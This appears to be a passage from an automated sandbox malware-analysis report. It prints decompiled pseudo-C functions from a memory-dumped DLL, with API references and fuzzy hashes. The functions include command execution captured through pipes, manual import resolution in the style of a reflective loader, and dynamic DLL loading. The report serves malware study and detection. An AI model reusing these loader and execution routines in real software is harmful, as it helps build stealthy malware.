				 *((intOrPtr*)(_t29 + 0x434)) = E10008FA4(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3C1(_t3);
				_t7 = _t29 + 0x220; // 0x87806c0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3FC(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

APIs

GetCurrentProcess.KERNEL32(?,?,087804A0,?,1000353A), ref: 1000CF9B
GetModuleFileNameW.KERNEL32(00000000,08781AE4,00000105,?,?,087804A0,?,1000353A), ref: 1000CFBC
memset.MSVCRT ref: 1000CFED
GetVersionExA.KERNEL32(087804A0,087804A0,?,1000353A), ref: 1000CFF8
GetCurrentProcessId.KERNEL32(?,1000353A), ref: 1000CFFE

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
Instruction ID: b585eaf47835b1e69fe94979de649fd9c2e4cab01659644ccb5f3879e9bd62b3
Opcode Fuzzy Hash: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
Instruction Fuzzy Hash: DC019E749017149BE760DF308C8ABEABBE5EF94350F00082DF59693251EB70B705CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1000A99D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A99D(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E10008600( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x87ff878
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x87ff878
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E100085EA(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x87ff878
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x87ff878
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E1000918C(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009278(_t127);
						E10008600( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C384(_t127));
				_t98 =  *0x1001e68c; // 0x87ffa40
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E1000923C(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E10008600( &_v32, 0);
				return _t128;
			}

APIs

memset.MSVCRT ref: 1000A9DA
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000A9FE
CreatePipe.KERNEL32(1000658F,?,0000000C,00000000), ref: 1000AA15

Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646

Strings

D, xrefs: 1000AA35

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
Instruction ID: 746ba47fdd6cc5b050f282edc2f958d2642d0c94e781aeb0ddd390b9b3935c5a
Opcode Fuzzy Hash: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
Instruction Fuzzy Hash: 59511672900219AFEB41CFA8CC85FDEBBB9FB08380F514169F500E7255DB74AA458B65

Uniqueness

Uniqueness Score: -1.00%

Function 100124A6, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E100124A6(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E0A4(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124C3
LoadLibraryA.KERNEL32(00000000), ref: 1001255C

Strings

GetProcAddress, xrefs: 100124CC
kernel32.dll, xrefs: 100124BE

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
Instruction ID: 07b277518937ab197daabd61ad14ff0b0aa7506dcab8f797d25a3703402acd83
Opcode Fuzzy Hash: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
Instruction Fuzzy Hash: 73617CB5D00209EFDB40CF98C985BADBBF1FF08355F208599E815AB2A1D374AA90DF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4D9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x87804a0
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095C7(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x87804a0
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009626( &_v140, 0x40, L"%08x", E1000D40B(_t66 + 0xb0, E1000C384(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x87804a0
					asm("sbb eax, eax");
					_t25 = E100095C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x87804a0
					_t68 = E100092CB(_t26 + 0x1020);
					_v12 = _t68;
					E100085BB( &_v8);
					_t32 =  *0x1001e688; // 0x87804a0
					_t34 = E100092CB(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E17C(0x1001bb40, _t60);
					}
					 *0x1001e780 = _t38;
					E10008600( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E10008600(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x87ff9a0
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

APIs

LoadLibraryW.KERNEL32 ref: 1000C5D1
memset.MSVCRT ref: 1000C610

Strings

dll, xrefs: 1000C593
%08x, xrefs: 1000C53A

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
Instruction ID: 286451e2d6f5d77c3e96009a634a1e8f77bc4d61d346aa34e357d183eb196ad5
Opcode Fuzzy Hash: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
Instruction Fuzzy Hash: 9231E1B2904658AFF700CB68DC89F9E73ECEB58394F508129F105E7195EB34EE848B24

Uniqueness

Uniqueness Score: -1.00%

Function 10012D80, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D80(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x5fe85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015DA0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014B00(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x5fe85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C40( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x5fe85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C40(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x5fe85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x5fe85000
							E10015DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014B00( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x5fe85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

APIs

memcpy.MSVCRT ref: 10012E8D
memcpy.MSVCRT ref: 10012F04
memcpy.MSVCRT ref: 10012F33
memcpy.MSVCRT ref: 10012F5F
memcpy.MSVCRT ref: 10013014

Part of subcall function 10015DA0: memcpy.MSVCRT ref: 10015E7E

Part of subcall function 10014B00: memcpy.MSVCRT ref: 10014B2A

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction ID: 73544d1bf8d56d5a7bbbe12107b863a73eec727039acdfdce1cff8ad1696c42c
Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction Fuzzy Hash: 12D124B56006049FCB28CF69D8D4A6AB7F1FF88344B25892DE88ACB701D771F995CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6E, Relevance: 6.4, APIs: 4, Instructions: 424
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t117;
				signed int _t120;
				CHAR* _t122;
				intOrPtr _t123;
				CHAR* _t125;
				WCHAR* _t128;
				intOrPtr _t131;
				intOrPtr _t135;
				WCHAR* _t136;
				intOrPtr _t140;
				WCHAR* _t141;
				CHAR* _t142;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t151;
				WCHAR* _t152;
				signed int _t157;
				WCHAR* _t158;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t168;
				signed int _t171;
				signed int _t176;
				WCHAR* _t180;
				char _t181;
				intOrPtr _t195;
				intOrPtr _t206;
				signed int _t210;
				char _t215;
				WCHAR* _t226;
				intOrPtr _t230;
				intOrPtr _t233;
				WCHAR* _t234;
				signed int _t235;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				CHAR* _t246;
				intOrPtr _t258;
				intOrPtr _t266;
				void* _t267;
				void* _t269;
				intOrPtr _t270;
				void* _t276;
				intOrPtr _t278;
				void* _t295;
				void* _t296;
				intOrPtr _t302;
				WCHAR* _t322;
				CHAR* _t323;
				void* _t325;
				WCHAR* _t326;
				intOrPtr _t328;
				WCHAR* _t330;
				signed int _t333;
				intOrPtr* _t335;
				void* _t354;

				_t354 = __fp0;
				_t335 = (_t333 & 0xfffffff8) - 0x26c;
				_t117 =  *0x1001e688; // 0x87804a0
				_t242 = 0;
				_t325 = __ecx;
				_v620 = 0;
				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
					L8:
					_t13 = E1000B78E(0x1001b9c0,  &_v516) + 1; // 0x1
					E1000A853( &_v556, _t13, 0);
					_t295 = 0x64;
					_t120 = E1000A457( &_v556, _t295);
					 *0x1001e748 = _t120;
					if(_t120 != 0) {
						_push(0x4e5);
						_t296 = 0x10;
						 *0x1001e680 = E1000E1C7(0x1001b9c4, _t296);
						 *_t335 = 0x610;
						_t122 = E100095C7(0x1001b9c4);
						_push(_t242);
						_push(_t122);
						_v612 = _t122;
						_t123 =  *0x1001e688; // 0x87804a0
						_t125 = E100092CB(_t123 + 0x228);
						_t315 = _t125;
						_v616 = _t125;
						E100085BB( &_v612);
						_t128 = E1000B24F(_t125);
						__eflags = _t128;
						if(_t128 != 0) {
							_t234 = E10008955(_t315, 1, _t242, _t242);
							__eflags = _t234;
							if(_t234 != 0) {
								_t235 = E1000A2C9(_t234);
							} else {
								_t235 = _t242;
							}
							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
							 *_t325 = 3;
						}
						E10008600( &_v616, 0xfffffffe);
						_t131 =  *0x1001e688; // 0x87804a0
						_t21 = _t131 + 0x114; // 0x87805b4
